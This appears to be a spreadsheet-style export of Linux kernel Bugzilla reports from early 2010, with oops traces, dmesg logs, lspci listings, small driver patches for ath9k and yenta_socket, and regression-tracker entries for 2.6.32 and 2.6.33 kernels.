... kernel:[ 3696.159723] Stack: Message from syslogd@linux-g3rs at Jan 29 14:04:45 ... kernel:[ 3696.159788] Call Trace: Message from syslogd@linux-g3rs at Jan 29 14:04:45 ... kernel:[ 3696.160006] Code: 26 00 00 00 00 e8 ab d6 f6 ff 8d 74 26 00 8d bc 27 00 00 00 00 55 89 e5 83 ec 18 89 5d f4 89 c3 65 a1 14 00 00 00 89 45 f0 31 c0 &lt;f7&gt; 03 00 00 03 00 89 75 f8 89 7d fc 0f 85 e5 00 00 00 f0 ff 4b Message from syslogd@linux-g3rs at Jan 29 14:04:45 ... kernel:[ 3696.160006] EIP: [&lt;c02e1da6&gt;] put_page+0x16/0x120 SS:ESP 0068:f515bd84 Message from syslogd@linux-g3rs at Jan 29 14:04:45 ... kernel:[ 3696.160006] CR2: 0000000000000001 Dmesg: [ 2889.367218] wlan0: associated [ 3251.001043] wlan0: no probe response from AP 00:11:20:68:be:50 - disassociating [ 3252.186610] wlan0: authenticate with AP 00:11:20:68:be:50 [ 3252.385045] wlan0: authenticate with AP 00:11:20:68:be:50 [ 3252.387045] wlan0: authenticated [ 3252.387052] wlan0: associate with AP 00:11:20:68:be:50 [ 3252.389632] wlan0: RX ReassocResp from 00:11:20:68:be:50 (capab=0x421 status=0 aid=233) [ 3252.389638] wlan0: associated [ 3376.004150] wlan0: no probe response from AP 00:11:20:68:be:50 - disassociating [ 3377.186182] wlan0: authenticate with AP 00:11:20:68:be:50 [ 3377.384079] wlan0: authenticate with AP 00:11:20:68:be:50 [ 3377.385773] wlan0: authenticated [ 3377.385779] wlan0: associate with AP 00:11:20:68:be:50 [ 3377.387990] wlan0: RX ReassocResp from 00:11:20:68:be:50 (capab=0x421 status=0 aid=238) [ 3377.387995] wlan0: associated [ 3456.004128] wlan0: no probe response from AP 00:11:20:68:be:50 - disassociating [ 3457.191312] wlan0: authenticate with AP 00:11:20:68:be:50 [ 3457.194751] wlan0: authenticated [ 3457.194758] wlan0: associate with AP 00:11:20:68:be:50 [ 3457.204770] wlan0: RX ReassocResp from 00:11:20:68:be:50 (capab=0x421 status=0 aid=240) [ 3457.204779] wlan0: associated [ 3471.005048] wlan0: no probe response from AP 00:11:20:68:be:50 - disassociating [ 3472.186710] wlan0: authenticate with AP 00:11:20:68:be:50 [ 3472.188629] wlan0: authenticated [ 3472.188637] wlan0: associate with AP 00:11:20:68:be:50 [ 3472.192221] wlan0: RX ReassocResp from 00:11:20:68:be:50 (capab=0x421 status=0 aid=241) [ 3472.192228] wlan0: associated [ 3575.988065] wlan0: no probe response from AP 00:11:20:68:be:50 - disassociating [ 3577.175363] wlan0: authenticate with AP 00:11:20:68:be:50 [ 3577.177540] wlan0: authenticated [ 3577.177548] wlan0: associate with AP 00:11:20:68:be:50 [ 3577.181047] wlan0: RX ReassocResp from 00:11:20:68:be:50 (capab=0x421 status=0 aid=245) [ 3577.181053] wlan0: associated [ 3591.000143] wlan0: no probe response from AP 00:11:20:68:be:50 - disassociating [ 3592.187205] wlan0: authenticate with AP 00:11:20:68:be:50 [ 3592.189059] wlan0: authenticated [ 3592.189066] wlan0: associate with AP 00:11:20:68:be:50 [ 3592.191952] wlan0: RX ReassocResp from 00:11:20:68:be:50 (capab=0x421 status=0 aid=246) [ 3592.191958] wlan0: associated [ 3616.000106] wlan0: no probe response from AP 00:11:20:68:be:50 - disassociating [ 3617.192726] wlan0: authenticate with AP 00:11:20:68:be:50 [ 3617.195899] wlan0: authenticated [ 3617.195904] wlan0: associate with AP 00:11:20:68:be:50 [ 3617.206236] wlan0: RX ReassocResp from 00:11:20:68:be:50 (capab=0x421 status=0 aid=247) [ 3617.206242] wlan0: associated [ 3656.004199] wlan0: no probe response from AP 00:11:20:68:be:50 - disassociating [ 3657.186858] wlan0: authenticate with AP 00:11:20:68:be:50 [ 3657.188580] wlan0: authenticated [ 3657.188588] wlan0: associate with AP 00:11:20:68:be:50 [ 3657.190808] wlan0: RX ReassocResp from 00:11:20:68:be:50 (capab=0x421 status=0 aid=249) [ 3657.190814] wlan0: associated [ 3686.005103] wlan0: no probe response from AP 00:11:20:68:be:50 - disassociating [ 3687.206388] wlan0: authenticate with AP 00:17:0f:23:96:d0 [ 3687.208078] wlan0: authenticated [ 3687.208084] wlan0: associate with AP 00:17:0f:23:96:d0 [ 3687.210133] wlan0: RX ReassocResp from 00:17:0f:23:96:d0 (capab=0x421 status=0 aid=60) [ 3687.210140] wlan0: associated [ 3696.004058] wlan0: no probe response from AP 00:17:0f:23:96:d0 - disassociating [ 3696.159312] BUG: unable to handle kernel NULL pointer dereference at 00000001 [ 3696.159333] IP: [&lt;c02e1da6&gt;] put_page+0x16/0x120 [ 3696.159350] *pde = 00000000 [ 3696.159359] Oops: 0000 [#1] SMP [ 3696.159369] last sysfs file: /sys/devices/pci0000:00/0000:00:1a.0/usb3/3-1/devnum [ 3696.159381] Modules linked in: lp parport_pc ppdev parport st ide_gd_mod ide_cd_mod ide_core nfs lockd fscache nfs_acl auth_rpcgss sunrpc af_packet ip6t_LOG xt_tcpudp xt_pkttype ipt_LOG xt_limit snd_pcm_oss snd_mixer_oss snd_seq snd_seq_device edd i915 drm i2c_algo_bit binfmt_misc ip6t_REJECT nf_conntrack_ipv6 ip6table_raw xt_NOTRACK ipt_REJECT xt_state iptable_raw iptable_filter ip6table_mangle nf_conntrack_netbios_ns nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 ip_tables ip6table_filter ip6_tables x_tables ipv6 fuse loop dm_mod arc4 ecb cryptomgr aead pcompress crypto_blkcipher crypto_hash crypto_algapi sr_mod sg snd_hda_codec_conexant video output iTCO_wdt i2c_i801 uvcvideo videodev v4l1_compat ath9k mac80211 ath cdrom joydev serio_raw acer_wmi cfg80211 i2c_core led_class pcspkr atl1c iTCO_vendor_support rfkill snd_hda_intel battery wmi snd_hda_codec snd_hwdep ac button snd_pcm snd_timer snd soundcore snd_page_alloc intel_agp ext4 jbd2 crc16 usbhid hid ata_generic ata_piix rtc_cmos rtc_core rtc_lib ahci uhci_hcd libata ehci_hcd fan thermal processor thermal_sys hwmon [last unloaded: parport_pc] [ 3696.159645] [ 3696.159653] Pid: 534, comm: phy0 Not tainted (2.6.31.8-0.1-default #1) Extensa 5635Z [ 3696.159665] EIP: 0060:[&lt;c02e1da6&gt;] EFLAGS: 00010246 CPU: 0 [ 3696.159675] EIP is at put_page+0x16/0x120 [ 3696.159683] EAX: 00000000 EBX: 00000001 ECX: f5ff2d80 EDX: f6577d40 [ 3696.159693] ESI: f5ff2d80 EDI: f5ff2d80 EBP: f515bd9c ESP: f515bd84 [ 3696.159703] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 [ 3696.159713] Process phy0 (pid: 534, ti=f515a000 task=f66f6270 task.ti=f515a000) [ 3696.159723] Stack: [ 3696.159728] 00000000 00000000 7e089908 00000001 00000000 7e089908 f515bdb0 c055f0a7 [ 3696.159745] &lt;0&gt; 7e089908 f5ff2d80 00000009 f515bdc0 c055eac2 7e089908 f67761a0 f515bdcc [ 3696.159765] &lt;0&gt; c055eb8b 7e089908 f515be0c f8947607 7e089908 f515bde8 c06031c4 7e089908 [ 3696.159788] Call Trace: [ 3696.159808] [&lt;c055f0a7&gt;] skb_release_data+0xa7/0xc0 [ 3696.159823] [&lt;c055eac2&gt;] __kfree_skb+0x22/0xc0 [ 3696.159836] [&lt;c055eb8b&gt;] consume_skb+0x2b/0x60 [ 3696.159871] [&lt;f8947607&gt;] ieee80211_tx_status+0x457/0x490 [mac80211] [ 3696.159911] [&lt;f8adc2f2&gt;] ath_tx_complete+0xe2/0x110 [ath9k] [ 3696.159964] [&lt;f8adc39c&gt;] ath_tx_complete_buf+0x7c/0xe0 [ath9k] [ 3696.160006] [&lt;f8add89c&gt;] ath_draintxq+0x14c/0x2a0 [ath9k] [ 3696.160006] [&lt;f8adf1a6&gt;] ath_drain_all_txq+0xf6/0x130 [ath9k] [ 3696.160006] [&lt;f8ada75e&gt;] ath_set_channel+0x8e/0x180 [ath9k] [ 3696.160006] [&lt;f8adaa02&gt;] ath9k_config+0x1b2/0x210 [ath9k] [ 3696.160006] [&lt;f8946166&gt;] ieee80211_hw_config+0x86/0xe0 [mac80211] [ 3696.160006] [&lt;f894bba2&gt;] ieee80211_scan_work+0xc2/0x230 [mac80211] [ 3696.160006] [&lt;c02664ee&gt;] run_workqueue+0x9e/0x1b0 [ 3696.160006] [&lt;c0266690&gt;] worker_thread+0x90/0x100 [ 3696.160006] [&lt;c026bcd4&gt;] kthread+0x84/0x90 [ 3696.160006] [&lt;c0204db7&gt;] kernel_thread_helper+0x7/0x10 [ 3696.160006] Code: 26 00 00 00 00 e8 ab d6 f6 ff 8d 74 26 00 8d bc 27 00 00 00 00 55 89 e5 83 ec 18 89 5d f4 89 c3 65 a1 14 00 00 00 89 45 f0 31 c0 &lt;f7&gt; 03 00 00 03 00 89 75 f8 89 7d fc 0f 85 e5 00 00 00 f0 ff 4b [ 3696.160006] EIP: [&lt;c02e1da6&gt;] put_page+0x16/0x120 SS:ESP 0068:f515bd84 [ 3696.160006] CR2: 0000000000000001 [ 3696.160481] ---[ end trace 63b341a7dd6a0e38 ]---</t>
  </si>
  <si>
    <t>new atheros chipset</t>
  </si>
  <si>
    <t>2010-01-31 01:11 UTC</t>
  </si>
  <si>
    <t>2010-03-11 22:38 UTC</t>
  </si>
  <si>
    <t>I got myself an ASUS 1005p which apparently has a new chip that is not yet correctly identified by the current kernel. http://wiki.debian.org/DebianEeePC/Model/1005P has the lspci information and some other stuff. It may be that the "fix" is as easy as diff --git a/drivers/net/wireless/ath/ath9k/pci.c b/drivers/net/wireless/ath/ath9k/pci.c index f7af5ea..6759f3b 100644 --- a/drivers/net/wireless/ath/ath9k/pci.c +++ b/drivers/net/wireless/ath/ath9k/pci.c @@ -25,6 +25,7 @@ static struct pci_device_id ath_pci_id_table[] __devinitdata = { { PCI_VDEVICE(ATHEROS, 0x0029) }, /* PCI */ { PCI_VDEVICE(ATHEROS, 0x002A) }, /* PCI-E */ { PCI_VDEVICE(ATHEROS, 0x002B) }, /* PCI-E */ + { PCI_VDEVICE(ATHEROS, 0x002C) }, /* PCI-E */ { PCI_VDEVICE(ATHEROS, 0x002D) }, /* PCI */ { PCI_VDEVICE(ATHEROS, 0x002E) }, /* PCI-E */ { 0 } My first attempt to recompile a kernel patched in this way failed. I'm going for the second attempt now and will let you know how things went.</t>
  </si>
  <si>
    <t>Radeon KMS: [RV730] Garbled kwin shadows and pixmaps</t>
  </si>
  <si>
    <t>2010-01-31 11:56 UTC</t>
  </si>
  <si>
    <t>2010-03-06 11:48 UTC</t>
  </si>
  <si>
    <t>Created attachment 24816 [details] Xserver log Since 2.6.33-rc4 up to rc6 I randomly have garbled kwin shadows, either blue or yellow frames around the window shadows. In kernels 2.6.32 and &lt;=2.6.33-rc3 this was not observable (=regression). Also described here by someone else: http://bbs.archlinux.org/viewtopic.php?pid=690047#p690047 The effect happens randomly when switching between windows. However, it is also 100% reproducable for me by the command x11perf -create After this the window has a white shadow frame (see screenshot). The window entry in the taskbar is sometimes garbled with a white pixmap too (see screenshot). If running with kwin composite *disabled*, only the white pixmap is observed -- as window shadow effects are disabled. Kernel log or xserver log do not provide any useful hints. Bisecting the git kernel shows this as culprit: &gt; [c07d7237a639d57dc91ea7efdbc1b3f85c7a095d] Merge branch 'drm-linus' of &gt; git://git.kernel.org/pub/scm/linux/kernel/git/airlied/drm-2.6 &gt; c07d7237a639d57dc91ea7efdbc1b3f85c7a095d is the first bad commit Bisecting branch "drm-linus" further showed this culprit: &gt; cafe6609d6dc0a6a278f9fdbb59ce4d761a35ddd is the first bad commit &gt; commit cafe6609d6dc0a6a278f9fdbb59ce4d761a35ddd &gt; Author: Jerome Glisse &lt;jglisse@redhat.com&gt; &gt; Date: Thu Jan 7 12:39:21 2010 +0100 &gt; &gt; drm/radeon/kms: Schedule host path read cache flush through the ring V2 After reverting this patch on 2.6.33-rc6, the issue was resolved on my hardware configuration. However, I am unsure about the internals of this commit. Information hopefully is sufficient for an expert to track this further. Environment: Linux 2.6.33-rc4..6 with Radeon KMS ("modprobe radeon modeset=1") Mesa master branch xf86-video-ati master branch Xorg server 1.7.4 libdrm 2.4.17 (or master too) KDE 4.3.95 (composite desktop enabled or disabled, see above)</t>
  </si>
  <si>
    <t>Graphic subsystem freeze</t>
  </si>
  <si>
    <t>2010-01-31 12:13 UTC</t>
  </si>
  <si>
    <t>aix27249</t>
  </si>
  <si>
    <t>2010-02-21 21:33 UTC</t>
  </si>
  <si>
    <t>Created attachment 24820 [details] Kernel config X11 completely freezes sometimes, usually (but not always) after long uptime (about 10 hours). Switching to first console and back still works, but X11 remains unusable even after restarting X server. When it happens, I see huge amount of messages like this in dmesg: [56922.328238] [drm:i915_gem_execbuffer] *ERROR* Execbuf while wedged [56922.425534] [drm:i915_gem_execbuffer] *ERROR* Execbuf while wedged [56922.525589] [drm:i915_gem_execbuffer] *ERROR* Execbuf while wedged [56922.625558] [drm:i915_gem_execbuffer] *ERROR* Execbuf while wedged [56922.706773] [drm:i915_gem_execbuffer] *ERROR* Execbuf while wedged Hardware: Apple Macbook 1st gen lspci: root@mac:~# lspci 00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS, 943/940GML Express Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03) 00:07.0 Performance counters: Intel Corporation Device 27a3 (rev 03) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02) 00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 02) 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA IDE Controller (rev 02) 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 02) 01:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8053 PCI-E Gigabit Ethernet Controller (rev 22) 02:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02) 03:03.0 FireWire (IEEE 1394): Agere Systems FW322/323 (rev 61) Kernel config attached.</t>
  </si>
  <si>
    <t>second suspend fails and system freezes in hp 6910P laptop</t>
  </si>
  <si>
    <t>2.6.32-6</t>
  </si>
  <si>
    <t>2010-01-31 15:53 UTC</t>
  </si>
  <si>
    <t>2011-01-17 00:17 UTC</t>
  </si>
  <si>
    <t>Hi, Suspend to ram works for first time. Second time when I try system freezes. I am not seeing any errors on kernel logs. I use intel 965GM graphics. And this issue is reproducible all times.</t>
  </si>
  <si>
    <t>ENE CB712 CardBus bridge needs special treatment with Echo Audio Indigo soundcards</t>
  </si>
  <si>
    <t>2010-01-31 17:52 UTC</t>
  </si>
  <si>
    <t>Michał Pecio</t>
  </si>
  <si>
    <t>2010-03-06 14:10 UTC</t>
  </si>
  <si>
    <t>Indigos are well known for distortions when running on some buggy ENE controllers. There is a workaround in the yenta driver, but for some reason it isn't activated on CB712. However, I own a laptop with such chip and it seems that it also is affected - I can clearly hear occasional cracks, especially under heavy network load, and in Windows XP the card is completely unusable :) This simple change fixed things for me: --- yenta_socket.c~ 2009-12-09 20:53:14.000000000 +0100 +++ yenta_socket.c 2010-02-01 17:04:06.000000000 +0100 @@ -1358,7 +1358,7 @@ static struct pci_device_id yenta_table CB_ID(PCI_VENDOR_ID_TI, PCI_DEVICE_ID_TI_7610, TI12XX), CB_ID(PCI_VENDOR_ID_ENE, PCI_DEVICE_ID_ENE_710, TI12XX), - CB_ID(PCI_VENDOR_ID_ENE, PCI_DEVICE_ID_ENE_712, TI12XX), + CB_ID(PCI_VENDOR_ID_ENE, PCI_DEVICE_ID_ENE_712, ENE), CB_ID(PCI_VENDOR_ID_ENE, PCI_DEVICE_ID_ENE_720, TI12XX), CB_ID(PCI_VENDOR_ID_ENE, PCI_DEVICE_ID_ENE_722, TI12XX), CB_ID(PCI_VENDOR_ID_ENE, PCI_DEVICE_ID_ENE_1211, ENE), I've only touched the CB712, but Echo's FAQ says that CB710 and CB720 are also affected. http://www.echoaudio.com/downloadfiles/Other/ENE_README.pdf On my system, ene_tune_bridge() changes register 0xC9 from 4 to 2. Changing it few times back and forth with setpci during playback with running "ping -f" confirmed that this is indeed the cause of my problem. lspci: 06:04.0 0607: 1524:1412 (rev 10) 06:04.0 CardBus bridge: ENE Technology Inc CB-712/4 Cardbus Controller (rev 10) Subsystem: Acer Incorporated [ALI] Device 0090 Flags: bus master, medium devsel, latency 168, IRQ 16 Memory at f0102000 (32-bit, non-prefetchable) [size=4K] Bus: primary=06, secondary=07, subordinate=0a, sec-latency=176 Memory window 0: 60000000-63fff000 (prefetchable) Memory window 1: 68000000-6bfff000 I/O window 0: 00007000-000070ff I/O window 1: 00007400-000074ff 16-bit legacy interface ports at 0001 Kernel driver in use: yenta_cardbus Kernel modules: yenta_socket 07:00.0 0480: 1057:3410 (rev 01) 07:00.0 Multimedia controller: Motorola DSP56361 Digital Signal Processor (rev 01) Subsystem: Echo Digital Audio Corporation Indigo IO Flags: bus master, medium devsel, latency 192, IRQ 16 Memory at 68000000 (32-bit, non-prefetchable) [size=1M] Kernel driver in use: Echoaudio Indigo IO Kernel modules: snd-indigoio</t>
  </si>
  <si>
    <t>netperf ~50% regression with 2.6.33-rc1, bisect to 1b9508f</t>
  </si>
  <si>
    <t>2010-01-31 22:45 UTC</t>
  </si>
  <si>
    <t>2010-03-22 21:29 UTC</t>
  </si>
  <si>
    <t>Subject : netperf ~50% regression with 2.6.33-rc1, bisect to 1b9508f Submitter : Lin Ming &lt;ming.m.lin@intel.com&gt; Date : 2010-01-25 10:03 References : http://marc.info/?l=linux-kernel&amp;m=126441481427331&amp;w=4 Handled-By : Mike Galbraith &lt;efault@gmx.de&gt; Handled-By : Peter Zijlstra &lt;peterz@infradead.org&gt; This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>tty: possible irq lock inversion dependency in tty_fasync</t>
  </si>
  <si>
    <t>2010-01-31 23:00 UTC</t>
  </si>
  <si>
    <t>2010-01-31 23:02 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.32.6] tty: possible irq lock inversion dependency in tty_fasync Submitter : Tetsuo Handa &lt;penguin-kernel@i-love.sakura.ne.jp&gt; Date : 2010-01-26 3:16 References : http://marc.info/?l=linux-kernel&amp;m=126447580723608&amp;w=4 Message-ID : 201001260316.o0Q3GQbR080648@www262.sakura.ne.jp This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel BUG at include/net/netns/generic.h:41, pfkey_create+0x36/0x18b [af_key]</t>
  </si>
  <si>
    <t>2010-01-31 23:34 UTC</t>
  </si>
  <si>
    <t>2010-02-10 19:23 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.33-rc5] kernel BUG at include/net/netns/generic.h:41! Submitter : Luca Tettamanti &lt;kronos.it@gmail.com&gt; Date : 2010-01-30 13:23 References : http://marc.info/?l=linux-netdev&amp;m=126485785004775&amp;w=4 Handled-By : Alexey Dobriyan &lt;adobriyan@gmail.com&gt; Patch : http://patchwork.kernel.org/patch/75891/ This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kmem_cache_create: duplicate cache ccid2_h</t>
  </si>
  <si>
    <t>2010-01-31 23:51 UTC</t>
  </si>
  <si>
    <t>2010-02-10 19:25 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc6, swapper - not tainted Submitter : Heinz Diehl &lt;htd@fancy-poultry.org&gt; Date : 2010-01-30 18:33 References : http://marc.info/?l=linux-kernel&amp;m=126487640324942&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>padlock_sha1 and hmac broken?</t>
  </si>
  <si>
    <t>2010-01-31 23:55 UTC</t>
  </si>
  <si>
    <t>2010-02-07 23:14 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.32: padlock_sha1 and hmac broken? Submitter : Wolfgang Walter &lt;wolfgang.walter@stwm.de&gt; Date : 2010-01-29 23:44 References : http://marc.info/?l=linux-kernel&amp;m=126480912924283&amp;w=4 Handled-By : Herbert Xu &lt;herbert@gondor.apana.org.au&gt; Patch : http://patchwork.kernel.org/patch/75959/ This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Radeon KMS regression</t>
  </si>
  <si>
    <t>2010-02-01 00:02 UTC</t>
  </si>
  <si>
    <t>2010-02-02 20:25 UTC</t>
  </si>
  <si>
    <t>Subject : Radeon KMS regression still present in 2.6.33-rc6 Submitter : Kevin Winchester &lt;kjwinchester@gmail.com&gt; Date : 2010-01-30 17:18 References : http://marc.info/?l=linux-kernel&amp;m=126487191019612&amp;w=4 Handled-By : FUJITA Tomonori &lt;fujita.tomonori@lab.ntt.co.jp&gt; Patch : http://patchwork.kernel.org/patch/75023/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline. Caused by: commit 42590a75019a50012f25a962246498dead428433 Author: FUJITA Tomonori &lt;fujita.tomonori@lab.ntt.co.jp&gt; Date: Mon Jan 4 16:16:23 2010 +0900 x86/agp: Fix agp_amd64_init and agp_amd64_cleanup This fixes the regression introduced by the commit f405d2c02395a74d3883bd03ded36457aa3697ad. Signed-off-by: FUJITA Tomonori &lt;fujita.tomonori@lab.ntt.co.jp&gt; LKML-Reference: &lt;20100104161603L.fujita.tomonori@lab.ntt.co.jp&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; First-Bad-Commit : 42590a75019a50012f25a962246498dead428433</t>
  </si>
  <si>
    <t>NFS problems in 2.6.33-rc6: Unknown error 526</t>
  </si>
  <si>
    <t>2010-02-01 00:22 UTC</t>
  </si>
  <si>
    <t>2010-04-08 22:52 UTC</t>
  </si>
  <si>
    <t>Subject : NFS problems in 2.6.33-rc6: Unknown error 526 Submitter : "J.A. Magallón" &lt;jamagallon@ono.com&gt; Date : 2010-01-31 22:46 References : http://marc.info/?l=linux-kernel&amp;m=126497800408928&amp;w=4 This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>lockdep warning during elevator_switch</t>
  </si>
  <si>
    <t>2010-02-01 00:24 UTC</t>
  </si>
  <si>
    <t>2010-03-22 21:27 UTC</t>
  </si>
  <si>
    <t>Subject : lockdep warning during elevator_switch Submitter : Hugh Dickins &lt;hugh.dickins@tiscali.co.uk&gt; Date : 2010-01-31 23:55 References : http://marc.info/?l=linux-kernel&amp;m=126498212613051&amp;w=4 This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Pineview - only cursor on black screen visible, "GPU hung" in dmesg</t>
  </si>
  <si>
    <t>2.6.33-rc7</t>
  </si>
  <si>
    <t>2010-02-01 20:15 UTC</t>
  </si>
  <si>
    <t>Christian Friedemann</t>
  </si>
  <si>
    <t>2010-02-21 21:21 UTC</t>
  </si>
  <si>
    <t>Created attachment 24854 [details] kernel .config Impossible to start X with 2.6.33rc kernel, because there is nothing on the screen except the cursor. The cursor changes if you get over an icon(or better: the place where it should be). Switching to tty works. [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung render error detected, EIR: 0x00000000 Compiling 2.6.32.* kernel with exactly the same settings works just fine. Xorg log, output of dmesg, lspci -vxxx and lsmod and my kernel .config are attached.</t>
  </si>
  <si>
    <t>DRI can't be enabled on ia64 systems</t>
  </si>
  <si>
    <t>2.6.30 and following</t>
  </si>
  <si>
    <t>2010-02-02 20:55 UTC</t>
  </si>
  <si>
    <t>Émeric Maschino</t>
  </si>
  <si>
    <t>2012-06-18 14:45 UTC</t>
  </si>
  <si>
    <t>Hi, I've been asked at http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546655#51 to file a bug report about this issue, so please find it below. With Linux kernel 2.6.30 and above, DRI can't be enabled on ia64 systems. Additionally, dmesg reports (with drm.debug=1 passed to kernel): [ 23.807789] [drm] Initialized drm 1.1.0 20060810 [ 23.821636] [drm] Initialized radeon 1.30.0 20080528 for 0000:80:00.0 on minor 0 [ 24.137421] [drm:drm_mmap_locked] *ERROR* Could not find map I've found this bug during kernel 2.6.33 development cycle. Last working kernel was 2.6.29. I've bisected this regression to commit f1a2a9b6189f9f5c27672d4d32fec9492c6486b2 (drm: Preserve SHMLBA bits in hash key for _DRM_SHM mappings) during kernel 2.6.30 development cycle. Simply reverting this patch from current kernel source (2.6.33-rc6 as time of writing) enables back DRI on ia64 systems. Since this is a generic patch, I've asked several times the author (David Miller &lt;davem@davemloft.net&gt;) for help through the linux-ia64 list and by email. Still no answer at this time. Cheers, Émeric</t>
  </si>
  <si>
    <t>Kernel freezes when playing DVB stream and having 3D acceleration in the same time</t>
  </si>
  <si>
    <t>2010-02-03 20:34 UTC</t>
  </si>
  <si>
    <t>2011-02-01 22:40 UTC</t>
  </si>
  <si>
    <t>Hello, I MUST report silly regression which occured in 2.6.32 kernel. When playing DVB stream and having 3D acceleration same time kernel freezes. This occured when my screensaver started after a while and I lost all my data! :( Driver radeon 01:00.0 VGA compatible controller: ATI Technologies Inc RV350 [Mobility Radeon 9600 M10] 2.6.31 works fine!</t>
  </si>
  <si>
    <t>recurring fscache oops on 2.6.32</t>
  </si>
  <si>
    <t>2.6.32.7</t>
  </si>
  <si>
    <t>2010-02-05 15:15 UTC</t>
  </si>
  <si>
    <t>2011-03-21 19:46 UTC</t>
  </si>
  <si>
    <t>Created attachment 24918 [details] .config of oopsing kernel I don't know what triggers it, but twice in the last day I've had a panic in the FScache code on 2.6.32.7. Fascinating, because cachefilesd isn't running, and there are no caches extant in its config file anyway. Nevertheless, I get the following Oops, and various NFS-using processes go into D forever: ------------[ cut here ]------------ kernel BUG at fs/nfs/fscache.c:360! invalid opcode: 0000 [#1] PREEMPT SMP last sysfs file: /sys/devices/pci0000:00/0000:00:1f.2/host3/target3:0:0/3:0:0:0/block/sdd/size CPU 0 Modules linked in: autofs4 coretemp hwmon nfs lockd nfs_acl auth_rpcgss sunrpc cachefiles fscache ipv6 cpufreq_ondemand acpi_cpufreq freq_table kvm_intel kvm snd_hda_intel snd_hda_codec snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_pcm_oss snd_usb_audio snd_usb_lib snd_mixer_oss snd_pcm snd_rawmidi snd_seq_device snd_timer e1000e snd_hwdep snd uvcvideo videodev usb_storage v4l1_compat firewire_ohci snd_page_alloc firewire_core ppdev v4l2_compat_ioctl32 iTCO_wdt iTCO_vendor_support soundcore i82975x_edac i2c_i801 pcspkr i2c_core edac_core crc_itu_t parport_pc parport raid1 [last unloaded: scsi_wait_scan] Pid: 14386, comm: php-cgi Not tainted 2.6.32.7-fun #1 RIP: 0010:[&lt;ffffffffa0354f63&gt;] [&lt;ffffffffa0354f63&gt;] nfs_fscache_release_page+0x2f/0x9e [nfs] RSP: 0018:ffff88006a3252d8 EFLAGS: 00210246 RAX: ffff880063d0e928 RBX: ffffea00039567d8 RCX: ffff880063d0e710 RDX: 0020000000000009 RSI: 00000000000852d0 RDI: ffffea00039567d8 RBP: ffff88006a3252f8 R08: ffff88006a325280 R09: 0000000000000012 R10: ffff880028214258 R11: 000000000000ead0 R12: 0000000000000000 R13: 00000000000852d0 R14: ffff88006a325578 R15: 0000000000000001 FS: 0000000000000000(0000) GS:ffff880028200000(0063) knlGS:00000000f777d730 CS: 0010 DS: 002b ES: 002b CR0: 000000008005003b CR2: 00000000f74cf000 CR3: 0000000043e81000 CR4: 00000000000026e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff4ff0 DR7: 0000000000000400 Process php-cgi (pid: 14386, threadinfo ffff88006a324000, task ffff8800af802040) Stack: 0000000000000020 ffffea00039567d8 00000000000852d0 ffff88006a325758 &lt;0&gt; ffff88006a325318 ffffffffa0331000 ffffea0003956820 ffffea00039567d8 &lt;0&gt; ffff88006a325328 ffffffff810cc268 ffff88006a325428 ffffffff810d83c3 Call Trace: [&lt;ffffffffa0331000&gt;] nfs_release_page+0x41/0x46 [nfs] [&lt;ffffffff810cc268&gt;] try_to_release_page+0x37/0x40 [&lt;ffffffff810d83c3&gt;] shrink_page_list+0x2d8/0x44c [&lt;ffffffff81431a05&gt;] ? _spin_unlock_irqrestore+0x70/0x7e [&lt;ffffffff8106cd68&gt;] ? 